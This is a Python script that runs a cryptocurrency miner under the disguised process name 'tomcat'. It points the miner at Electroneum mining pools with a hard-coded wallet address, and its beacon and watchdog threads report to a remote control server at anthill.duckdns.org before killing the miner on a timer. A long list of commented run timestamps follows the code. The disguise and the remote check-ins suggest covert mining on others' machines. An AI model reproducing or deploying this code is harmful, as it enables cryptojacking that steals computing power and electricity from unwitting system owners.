import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:10:04.170716
#2018-02-17 15:56:06.404104
#2018-02-17 17:44:01.368178
#2018-02-17 19:31:06.133990
#2018-02-17 21:20:08.150517
#2018-02-17 23:04:01.795879
#2018-02-18 00:51:02.121202
#2018-02-18 02:39:07.361206
#2018-02-18 04:27:05.422005
#2018-02-18 06:18:04.586651
#2018-02-18 08:08:06.679341
#2018-02-18 09:55:08.016383
#2018-02-18 11:43:01.888026
#2018-02-18 13:28:07.060822
#2018-02-18 15:18:04.254600
#2018-02-18 17:07:03.369582
#2018-02-18 18:53:07.054488
#2018-02-18 20:41:04.767016
#2018-02-18 22:26:02.089264
#2018-02-19 00:15:07.321194
#2018-02-19 02:01:05.646190
#2018-02-19 03:48:03.134642
#2018-02-19 05:32:05.565710
#2018-02-19 07:19:07.268696
#2018-02-19 09:08:04.948689
#2018-02-19 10:56:04.811867
#2018-02-19 12:45:06.920144
#2018-02-19 14:32:06.448339
#2018-02-19 16:21:07.121673
#2018-02-19 18:08:09.455838
#2018-02-19 19:56:07.804627
#2018-02-19 21:43:06.318592
#2018-02-19 23:29:03.701711
#2018-02-20 01:16:04.870260
#2018-02-20 03:07:05.304832
#2018-02-20 04:54:03.630837
#2018-02-20 06:36:08.558311
#2018-02-20 08:21:02.016024
#2018-02-20 10:06:07.067107
#2018-02-20 11:50:10.670830
#2018-02-20 13:38:07.114634
#2018-02-20 15:23:01.300956
#2018-02-20 17:10:05.113108
#2018-02-20 19:01:08.571267
#2018-02-20 20:50:08.251470
#2018-02-20 22:36:02.199858
#2018-02-21 00:16:07.622574
#2018-02-21 02:02:07.722923
#2018-02-21 03:49:07.358587
#2018-02-21 05:38:05.154539
#2018-02-21 07:26:09.082193
#2018-02-21 09:11:05.227337
#2018-02-21 11:00:09.275629
#2018-02-21 12:48:04.066463
#2018-02-21 14:38:02.095501
#2018-02-21 16:24:01.796396
#2018-02-21 18:15:02.768728
#2018-02-21 20:01:01.484259
#2018-02-21 21:49:08.640737
#2018-02-21 23:36:07.680804
#2018-02-22 01:26:04.299733
#2018-02-22 03:14:06.082037
#2018-02-22 04:59:06.436034
#2018-02-22 06:43:01.670583
#2018-02-22 08:31:08.164515
#2018-02-22 10:18:06.130590
#2018-02-22 12:03:04.588081
#2018-02-22 13:50:09.266914
#2018-02-22 15:39:08.490125
#2018-02-22 17:25:02.409664
#2018-02-22 19:12:01.522148
#2018-02-22 21:05:04.652807
#2018-02-22 22:50:05.970556
#2018-02-23 00:37:07.256571
#2018-02-23 02:25:07.520017
#2018-02-23 04:14:05.564223
#2018-02-23 06:01:05.400121
#2018-02-23 07:31:02.147093
#2018-02-23 09:36:04.355861
#2018-02-23 11:19:04.645464
#2018-02-23 12:38:01.409643
#2018-02-23 14:05:03.630653
#2018-02-23 15:42:06.798398
#2018-02-23 17:13:08.587215
#2018-02-23 18:47:02.198562
#2018-02-23 20:22:01.667534
#2018-02-23 21:55:06.351251
#2018-02-23 23:33:05.286690
#2018-02-24 01:01:04.319647
#2018-02-24 02:47:05.161290
#2018-02-24 04:23:01.844647
#2018-02-24 06:09:06.319222
#2018-02-24 07:56:06.957526
#2018-02-24 09:40:06.557116
#2018-02-24 11:36:06.527075
#2018-02-24 13:26:07.667305
#2018-02-24 15:14:07.561255
#2018-02-24 17:03:07.375937
#2018-02-24 18:52:05.163130
#2018-02-24 20:41:06.851994
#2018-02-24 22:50:01.350454
#2018-02-25 02:10:10.031286
#2018-02-25 05:43:06.120879
#2018-02-25 11:37:06.632945